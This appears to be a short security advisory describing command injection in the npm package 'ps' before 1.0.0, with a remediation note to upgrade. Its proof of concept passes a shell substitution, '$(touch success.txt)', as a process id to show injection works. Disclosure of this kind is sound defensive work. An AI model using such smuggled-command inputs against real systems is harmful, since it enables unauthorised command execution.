Severity: moderate

Command Injection

ps

Overview

Versions of ps before 1.0.0 are vulnerable to command injection.

Proof of concept:

var ps = require('ps');

ps.lookup({ pid: "$(touch success.txt)" }, function(err, proc) { // this method is vulnerable to command injection
    if (err) {throw err;}
    if (proc) {
        console.log(proc);  // Process name, something like "node" or "bash"
    } else {
        console.log('No such process');
    }
});

// Result: The file success.txt will exist on the filesystem if the touch command was executed

Remediation

Update to version 1.0.0 or later.

Advisory timeline

  1. Created

    2018-11-07T21:09:43.189Z
  2. Updated

    2018-11-07T21:09:48.095Z